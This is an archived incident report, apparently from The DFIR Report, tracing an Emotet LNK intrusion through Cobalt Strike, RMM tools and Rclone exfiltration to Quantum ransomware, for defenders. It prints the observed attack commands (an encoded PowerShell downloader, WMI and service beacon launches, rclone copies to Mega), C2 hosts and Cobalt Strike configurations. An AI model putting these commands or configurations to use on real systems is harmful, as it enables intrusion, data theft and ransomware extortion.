{
	"id": "6e41299a-3659-41a0-92c8-afbce62c48da",
	"created_at": "2026-04-06T00:16:15.544156Z",
	"updated_at": "2026-04-10T03:38:09.866549Z",
	"deleted_at": null,
	"sha1_hash": "a33062f301411b934bbbd17ce600b4e994063a8e",
	"title": "Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2563765,
	"plain_text": "Emotet Strikes Again - LNK File Leads to Domain Wide\r\nRansomware\r\nBy editor\r\nPublished: 2022-11-28 · Archived: 2026-04-06 00:03:16 UTC\r\nIn June of 2022, we observed a threat actor gaining access to an environment via Emotet and operating over an\r\neight-day period. During this time period, multiple rounds of enumeration and lateral movement occurred using\r\nCobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk. The\r\nthreat actor's final actions included data exfiltration using Rclone and domain-wide deployment of Quantum\r\nRansomware.\r\nWe have observed similar traits in previous cases where Emotet and Quantum were seen.\r\nCase Summary\r\nThe intrusion began when a user double-clicked an LNK file, which then executed encoded PowerShell commands\r\nto download an Emotet DLL onto the computer. Once executed, Emotet set up a Registry Run Key to maintain\r\npersistence on the beachhead host.\r\nEmotet then proceeded to execute a short list of discovery commands using the Windows utilities systeminfo,\r\nipconfig, and nltest targeting the network’s domain controllers. These commands would go on to be repeated daily\r\nby the Emotet process. Around one and one-half hours after execution, Emotet began sending spam emails,\r\nmailing new malicious attachments to continue spreading.\r\nSimilar activity continued over the second day, but on the third day of the incident, Emotet dropped a Cobalt\r\nStrike executable beacon onto the beachhead host. Using the Cobalt Strike beacon, the threat actors began\r\nconducting a new round of discovery activity. Windows net commands were run, targeting domain groups and\r\ncomputers, nltest was executed again, and they also used tasklist and ping to investigate a remote host.\r\nThe threat actor then moved laterally to a workstation. 
They first attempted this action using a PowerShell beacon\r\nand a remote service on the host, but while the script did execute on the remote host, it appeared to fail to connect\r\nto the command and control server. Next, they proceeded to transfer a beacon executable over SMB to the remote\r\nhost’s ProgramData directory. This beacon was then successfully executed via WMI and connected successfully to\r\nthe threat actors' server.\r\nOnce on this new host, the threat actors proceeded to run the net commands to review the Domain Administrators\r\ngroup again. They then proceeded to dump credentials from the LSASS process on the host. With some further\r\nprocess injection they then began to enumerate SMB shares across the environment and, on finding a primary file\r\nserver, reviewed several documents present on the server. This Cobalt Strike server stopped communicating shortly\r\nthereafter.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 1 of 38\n\nOn the fourth day of the intrusion, Emotet dropped a new Cobalt Strike beacon. Again, some net command\r\ndiscovery was run for domain admins and domain controller servers. A burst of netlogon authentications was\r\nobserved from the beachhead host to the domain controller as a possible attempt at exploiting the domain\r\ncontroller.\r\nThe threat actors, however, proceeded along a more traditional path, using SMB file transfers and remote services\r\nto move laterally across domain controllers and several other servers in the environment using Cobalt Strike\r\nbeacon DLLs. On the domain controller, the threat actors conducted further discovery tasks running find.bat\r\nand p.bat, which executed AdFind Active Directory discovery and performed a ping sweep across the\r\nenvironment.\r\nOn one of the other targeted servers, the threat actors deployed Tactical RMM, a remote management agent, for\r\nadditional access and persistence in the environment. 
From this server, the threat actors were observed using\r\nRclone to exfiltrate data from a file share server in the environment. The stolen data was sent to the Mega.io\r\nservice.\r\nOn the fifth day of the intrusion, the threat actors appeared again, attempting to exfiltrate data from the mail\r\nserver using Rclone, but this appeared to fail and the threat actors did not try to resolve the issue. After this\r\nthe threat actors went silent until the eighth and final day of the intrusion.\r\nOn the eighth day of the intrusion the threat actor accessed the environment using Tactical RMM to deploy\r\nAnydesk on the compromised host. After establishing a connection using Anydesk, the threat actors then dropped\r\nSoftPerfect’s Network Scanner and ran it to identify hosts across the environment.\r\nFrom there, the threat actors began connecting to other hosts via RDP, including a backup server. After\r\nchoosing a new server and connecting via RDP, the threat actors dropped Powertool64.exe and dontsleep.exe\r\nin preparation for their final actions. Finally, locker.dll and a batch file 1.bat were dropped on the host and\r\nthe batch file was executed, beginning the Quantum ransomware deployment to all hosts over SMB. From initial\r\nintrusion to ransomware deployment, 154 hours passed, over eight days.\r\nAfter ransomware deployment, the threat actors remained connected and used RDP to connect to a few other servers and\r\nexecuted ProcessHacker.exe and a net command. With no other activity taking place, we assess that this was\r\nlikely the threat actors confirming successful deployment of the ransomware payload across the network.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such\r\nas Cobalt Strike, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. 
More information on this service and\r\nothers can be found here.\r\nBoth of the Cobalt Strike servers in this case were on our Threat Feed (days to months) in advance of this\r\nintrusion.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs\r\nincluding Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nReport Lead: @iiamaleks\r\nAnalysis and reporting: @samaritan_o and @yatinwad\r\nInitial Access\r\nInitial access took the form of an LNK file delivered to a victim through a MalSpam campaign.\r\nThe PowerShell script embedded within the LNK is a Base64-encoded script with various components split into\r\ndifferent variables for obfuscation purposes. 
The script will decode itself rather than depend on PowerShell’s built-in ability to execute encoded scripts.\r\n..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c \"\u0026{'p8ArwZsj8ZO+Zy/dHPeI+siGhbaxtEhzw\r\nVsLWVuZXJnaWFraS5nci93cC1pbmNsdWRlcy9JZHJWS09HWU1Rb2R1N0lsT0loLyIsImh0dHA6Ly9kcmVjaHNsZXJzdGFtbXRpc2N\r\nvIiwiaHR0cDovL2RpbHNybC5jb20vcGhvbmUvcGZpcDVtLyIpOyR0PSJuZldGUSI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAt\r\nZjtSZWdzdnIzMi5leGUgIiRkXGp4S1BJck1GeEouT09mIjticmVha30gY2F0Y2ggeyB9fQ==';$KOKN='ICBXcml0ZS1Ib3N0ICJB\r\nKN=$KOKN+$BxQ;$GBUus=$KOKN;$xCyRLo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase\r\nThe PowerShell script, when executed by double-clicking the LNK, will attempt to connect to a set of domains hosting the\r\nEmotet malware. Upon successful download of the Emotet malware, the PowerShell script will write it to a\r\ntemporary directory and execute the payload via regsvr32.exe.\r\nIt is interesting to note that the LNK identifies the machine it was created on through the NetBIOS name of black-dog and a MAC address beginning with 08:00:27, indicating a system running on VirtualBox.\r\nMachine ID: black-dog\r\nMAC Address: 08:00:27:c6:74:5d\r\nMAC Vendor: PCS SYSTEMTECHNIK\r\nCreation: 2022-05-12 15:33:49\r\nExecution\r\nOnce the PowerShell script from the LNK file executed successfully, Emotet began execution. Emotet will\r\ninitially copy itself to a randomly named folder in the user's temporary folder.\r\nMultiple instances of Emotet spawning itself were observed over a period of three days. 
Almost all of the Emotet instances executed the same\r\nthree enumeration commands:\r\nsysteminfo\r\nipconfig /all\r\nnltest /dclist:\r\nTowards the third and fourth day of the intrusion, Cobalt Strike was dropped to disk as a PE executable and\r\nexecuted. This access was used to perform enumeration and move laterally to other hosts.\r\nThe following diagram aims to provide an illustration of the execution chain with multiple instances of Emotet\r\nleading to Cobalt Strike.\r\nPersistence\r\nThe Emotet malware has used various persistence methods over time; an example can be seen here.\r\nOn the first day, Emotet established persistence via a run key.\r\nAs we can see, the native Windows utility regsvr32.exe was used to launch the Emotet DLL.\r\nAfter moving to the hands-on-keyboard phase of the intrusion, the threat actors proceeded to deploy several\r\nremote management tools across the environment. Tactical RMM was the first tool chosen for deployment.\r\nTactical RMM is a remote management software platform that uses a combination of agents to allow for remote\r\nmanagement and access to systems.\r\nThe file 17jun.exe was deployed into the ProgramData folder on one of the servers. This was then executed by\r\nthe threat actors and resulted in the installation of the main RMM agent. 
The install completed with the following\r\ncommand:\r\n\"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m install --api https://api.floppasoftware[.]com --\r\nA service was also created for the agent.\r\nEvent 7045\r\nA service was installed in the system.\r\nService Name: TacticalRMM Agent Service\r\nService File Name: \"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m svc\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nAlong with the tacticalrmm.exe client, a second executable called meshagent.exe was installed to handle\r\nremote session interaction, and a separate service was created for that agent.\r\nEvent 7045\r\nA service was installed in the system.\r\nService Name: Mesh Agent\r\nService File Name: \"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\"\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nOn the final day of the intrusion, the threat actors added AnyDesk to the same server running Tactical RMM,\r\nproviding an additional means of access prior to the deployment of ransomware.\r\nEvent 7045\r\nA service was installed in the system.\r\nService Name: AnyDesk Service\r\nService File Name: \"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nPrivilege Escalation\r\nWe suspect a failed ZeroLogon exploit was attempted against a domain controller, originating from the beachhead\r\nhost with Cobalt Strike running on it. 
One indicator is the ‘mimikatz’ string in the Netlogon event that is used by\r\nthe Mimikatz Zerologon implementation.\r\nDuring a period of a few seconds, multiple NetrServerReqChallenge and NetrServerAuthenticate2 methods in the\r\ntraffic from a single source were observed; this is one of the indicators of a Zerologon attempt.\r\nDefense Evasion\r\nProcess Injection\r\nThe threat actor was observed injecting into legitimate processes and using them to execute their own tasks\r\non the system; this can be seen from Winlogon connecting to a domain associated with a Cobalt Strike server and\r\nremoving files from the system.\r\nThe specific mechanism used to inject into a foreign process was writing arbitrary code into its memory space\r\nand executing it as a remotely created thread. This occurred from rundll32.exe, which was previously used to\r\nexecute and run Cobalt Strike.\r\nThe following table summarizes the processes used for injection during this case:\r\nInjected Process Name | Injection Payload\r\nC:\\Windows\\system32\\winlogon.exe | Cobalt Strike\r\nC:\\Windows\\System32\\RuntimeBroker.exe | Cobalt Strike\r\nC:\\Windows\\System32\\svchost.exe | Cobalt Strike\r\nC:\\Windows\\System32\\taskhostw.exe | Cobalt Strike\r\nC:\\Windows\\system32\\dllhost.exe | Cobalt Strike\r\nPowerTool\r\nPowerTool was observed dropped and executed on the server used to deploy the ransomware payload. This tool\r\nhas the ability to kill a process, delete its process file, unload drivers, and delete the driver files. 
It has been\r\nreportedly used by several ransomware groups to aid in their operations [1][2][3][4].\r\nAs a byproduct of execution, PowerTool will drop a driver to disk and load it into the system.\r\nDriver Signature Name: 北京华林保软件技术有限公司\r\nIndicator Removal\r\nThe threat actor was observed deleting files that had been dropped to disk.\r\nCredential Access\r\nProcess access to LSASS was observed, likely to dump credentials from a process that was injected with Cobalt\r\nStrike. The Granted Access level matches known indicators for Mimikatz with an access value of 0x1010 (4112), as\r\nwe covered in a prior report.\r\nWe also observed a Cobalt Strike executable requesting access level 0x0040 (64) to LSASS, also indicating that\r\nother credential access tools may have been in use by the threat actor.\r\nDiscovery\r\nDuring the initial Emotet execution, three automated discovery commands were observed. These were then\r\nrepeated, occurring once a day from the Emotet host.\r\nsysteminfo\r\nipconfig /all\r\nnltest /dclist:\r\nMultiple commands responsible for enumerating Active Directory groups, domain-joined computers, and domain\r\ntrusts were executed via Cobalt Strike on the beachhead.\r\nwhoami /groups\r\nnet group /domain\r\nnet group \"domain computers\" /domain\r\nnet group /domain \"Domain controllers\"\r\nnet group \"domain admins\" /domain\r\nnltest /trusted_domains\r\nThe threat actor was observed querying a non-existent group Domain controller, followed by a command\r\ncorrecting the mistake that queried the group Domain controllers.\r\nnet group /domain \"Domain controller\"\r\nnet group /domain \"Domain controllers\"\r\nPing commands issued to a user workstation and a domain controller were observed moments before lateral\r\nmovement was attempted.\r\nping COMPUTER.REDACTED.local\r\nInvoke-ShareFinder was observed being used via 
PowerShell in the environment from an injected process with\r\nCobalt Strike:\r\nIn addition to the Invoke-ShareFinder command, other functions that were used by the script were also\r\nobserved.\r\nThe remnants of Invoke-ShareFinder could also be seen on the network through the consistent querying of\r\n“ADMIN$” and “C$” shares for each host over a short period of time. In addition to these shares, a few shares\r\nfrom the file servers were also accessed.\r\nOnce on the domain controller, two batch files were run. The first, find.bat, was used to run AdFind.exe for\r\nActive Directory discovery.\r\nfind.exe -f \"objectcategory=computer\"\r\nfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nfind.exe -subnets -f (objectCategory=subnet)\r\nfind.exe -f \"(objectcategory=group)\"\r\nfind.exe -gcb -sc trustdmp\r\nThe second script, p.bat, was run to sweep the network using ping, looking for network connectivity and online\r\nhosts.\r\nOn the final day, prior to ransomware deployment, the threat actor also dropped netscan.exe on the server, and\r\nexecuted it from the Tactical RMM meshagent.exe session.\r\nC:\\Windows\\System32\\mstsc mstsc.exe /v:IP_ADDRESS_1\r\nC:\\Windows\\System32\\mstsc mstsc.exe /v:IP_ADDRESS_2\r\nC:\\Windows\\SysWOW64\\explorer.exe \"C:\\Windows\\SysWOW64\\explorer.exe\" \\\\IP_ADDRESS_1\\C$\r\nC:\\Windows\\SysWOW64\\explorer.exe \"C:\\Windows\\SysWOW64\\explorer.exe\" \\\\IP_ADDRESS_2\\C$\r\nLateral Movement\r\nCobalt Strike Remote Service Creation\r\nThe threat actor was observed creating remote services in order to execute beacon DLL files transferred via SMB\r\nas SYSTEM on remote hosts.\r\nC:\\Windows\\System32\\cmd.exe /c rundll32.exe C:\\ProgramData\\x86.dll, StartA\r\nWMI\r\nIn another instance, an 
executable Cobalt Strike beacon was copied via SMB to a target machine, and then\r\nexecuted via WMI.\r\nwmic /node:IP_Address process call create \"cmd.exe /c start C:\\Progradata\\sc_https_x64.exe\"\r\nRemote Desktop\r\nLastly, traces of RDP (Remote Desktop Protocol) connections were discovered on multiple compromised hosts\r\nutilized for lateral movement on the final day of the intrusion and during the ransomware deployment.\r\nCollection\r\nOn the third day of the intrusion, after moving laterally, the threat actors began to review sensitive documents\r\nstored on network shares, including revenue, insurance, and password storage documents.\r\nThese documents were again reviewed by the threat actor on the final day of the intrusion. Later, the threat actor\r\nviewed the stolen files off-network, as observed through triggered canary tokens, which revealed connections from an\r\nAWS EC2 instance.\r\nCommand and Control\r\nEmotet\r\nThe Emotet loader pulled the main second-stage payload from the following domains:\r\nhxxps://descontador[.]com[.]br\r\nhxxps://www.elaboro[.]pl\r\nhxxps://el-energiaki[.]gr\r\nhxxp://drechslerstammtisch[.]de\r\nhxxp://dhnconstrucciones[.]com[.]ar\r\nhxxp://dilsrl[.]com\r\nThe second-stage loader had multiple IP addresses in its configuration to attempt connections 
to:\r\n103.159.224.46\r\n103.75.201.2\r\n119.193.124.41\r\n128.199.225.17\r\n131.100.24.231\r\n139.59.60.88\r\n144.217.88.125\r\n146.59.226.45\r\n149.56.131.28\r\n159.89.202.34\r\n165.22.211.113\r\n165.227.166.238\r\n178.128.82.218\r\n209.126.98.206\r\n213.32.75.32\r\n37.187.115.122\r\n45.226.53.34\r\n45.55.134.126\r\n46.55.222.11\r\n51.210.176.76\r\n51.254.140.238\r\n54.37.70.105\r\n82.223.82.69\r\n91.207.181.106\r\n92.114.18.20\r\n94.23.45.86\r\n96.125.171.16\r\nCobalt Strike\r\nThe following Cobalt Strike C2 servers were observed being used. Both HTTP and HTTPS were observed to be\r\nused.\r\n139.60.161.167 (survefuz[.]com)\r\n139.60.160.18 (juanjik[.]com)\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 20 of 38\n\n139.60.161.167 (survefuz[.]com)\r\nJA3s: 211897664d51cffdfd7f78d684602ecc\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nCertificate: 03:4e:01:cb:d0:d4:40:24:ad:e0:cd:81:9f:00:44:0f:1e:de\r\nNot Before: May 24 11:25:15 2022 GMT\r\nNot After: Aug 22 11:25:14 2022 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: survefuz[.]com\r\nPublic Algorithm: id-ecPublicKey\r\n139.60.160.18 (juanjik[.]com)\r\nJA3s: 211897664d51cffdfd7f78d684602ecc\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nCertificate: 04:ea:aa:59:1e:c6:50:6e:d3:70:d4:24:50:f0:a5:30:9a:e6\r\nNot Before: Jun 14 17:38:08 2022 GMT\r\nNot After: Sep 12 17:38:07 2022 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: juanjik[.]com\r\nPublic Algorithm: rsaEncryption\r\nThe following are the Cobalt Strike configurations observed:\r\n139.60.161.167 (survefuz[.]com)\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 45000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1403644,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"survefuz[.]com\",\r\n \"port\": 80,\r\n \"publickey\": 
\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqoyVkBHx713LeUHmw7FAozt15LWTMgX1nCLSXECllryU\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 21 of 38\n\n\"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 22 of 38\n\n\"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": 
null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\n139.60.160.18:80 (juanjik[.]com)\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"dns_beacon\": {},\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\"\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 23 of 38\n\n},\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform_x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform_x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"startrwx\": false,\r\n \"min_alloc\": \"17500\",\r\n \"userwx\": false,\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"NtMapViewOfSection\"\r\n },\r\n \"uses_cookies\": true,\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {},\r\n \"maxgetsize\": \"1403644\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm\r\n \"port\": \"443\",\r\n \"hostname\": \"juanjik[.]com\"\r\n },\r\n \"beacontype\": [\r\n 
\"HTTPS\"\r\n ],\r\n \"license_id\": \"206546002\",\r\n \"jitter\": \"37\",\r\n \"sleeptime\": \"45000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 24 of 38\n\n\"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/jquery-3.3.1.min.js\"\r\n },\r\n \"cfg_caution\": false,\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/jquery-3.3.2.min.js\"\r\n }\r\n}\r\n139.60.160.18:443 (juanjik[.]com)\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"dns_beacon\": {},\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform_x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 25 of 38\n\n],\r\n \"transform_x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"startrwx\": false,\r\n \"min_alloc\": \"17500\",\r\n \"userwx\": false,\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"NtMapViewOfSection\"\r\n },\r\n \"uses_cookies\": true,\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {},\r\n \"maxgetsize\": \"1403644\",\r\n \"proxy\": 
{\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm\r\n \"port\": \"80\",\r\n \"hostname\": \"juanjik[.]com\"\r\n },\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"license_id\": \"206546002\",\r\n \"jitter\": \"37\",\r\n \"sleeptime\": \"45000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n },\r\n \"client\": {\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 26 of 38\n\n\"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/jquery-3.3.1.min.js\"\r\n },\r\n \"cfg_caution\": false,\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/jquery-3.3.2.min.js\"\r\n }\r\n}\r\nTactical RMM Agent\r\nThe threat actor dropped a Tactical RMM Agent on one of the servers as an alternative command and control\r\navenue to access the network. During the installation of the software, the following command was observed:\r\n\"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m install --api https://api.floppasoftware[.]com --\r\nThis command reveals the floppasoftware.com domain used by the threat actor for the remote management of\r\nTactical RMM Agent. This domain was registered very close to the timeline of this incident.\r\nA domain registered to be used with Tactical RMM Agent will have both an api and mesh subdomain, in this\r\ncase api.floppasoftware[.]com and mesh.floppasoftware[.]com . 
These were both hosted on the same server,\r\nIP 212.73.150.62.\r\nIn addition, during the execution of Tactical RMM Agent, the software will reach out to a centralized domain in\r\norder to retrieve the current public IP address in use:\r\nicanhazip.tacticalrmm.io\r\nAnyDesk\r\nOn the final day of the intrusion, AnyDesk was deployed on the server on which they had previously installed Tactical\r\nRMM. Using this RMM agent they proceeded to install AnyDesk on the host. The following process activity\r\nwas observed from meshagent.exe.\r\nMeshAgent.exe -kvm1\r\n- Initiating Process File Name, column 6, row 12\r\n\"MeshAgent.exe\" -b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5j\r\nThe decoded Base64 content reveals commands for console access and connect actions.\r\nThis was then followed by the process flow below:\r\nOnce downloaded and installed, the threat actor initiated a connection to the AnyDesk host.\r\nClient-ID: 752733537 (FPR: 27ac27e2c9ed)\r\nLogged in from 84.17.49.114:1249\r\nExfiltration\r\nAs also seen in our last report on Emotet, the threat actors leveraged Rclone to exfiltrate data to Mega (Mega.nz) storage\r\nservices.\r\nrclone.exe copy \"\\\\SERVER.domain.name\\path\" mega:1 -q --ignore-existing --auto-confirm --multi-threa\r\nrclone.exe copy \"\\\\SERVER.domain.name\\path\" mega:2 -q --ignore-existing --auto-confirm --multi-threa\r\nIn the rclone.conf file, the threat actors left the details of the remote account being used.\r\nBrerinit@tempmail.de\r\nWith the help of Netflow, we identified that at least ~250MB worth of data was exfiltrated out of the 
environment.\r\nImpact\r\nSpam Email\r\nDuring the first two days, Emotet sent outbound spam emails over SMTP:\r\nThe following is an example of the SMTP traffic for sending the email, along with an extracted EML that was sent\r\nwith an attached XLS:\r\nRansomware\r\nTowards the last day of the intrusion, the threat actor made their preparations to deploy ransomware to the domain.\r\nThey started by connecting to a new server via RDP from the server on which they had just used Tactical RMM to deploy\r\nAnydesk. Once the RDP connection was established, they deployed Powertool64.exe, likely to prevent intervention\r\nby any security tools, and launched the software Don’t Sleep.\r\nDon’t Sleep has the capability to keep the computer from being shut down and the user from being signed off. This\r\nwas likely done to ensure nothing would interfere with the propagation of the ransomware payload.\r\nFinally, with Don’t Sleep running, the threat actor executed a batch script named “1.bat”. 
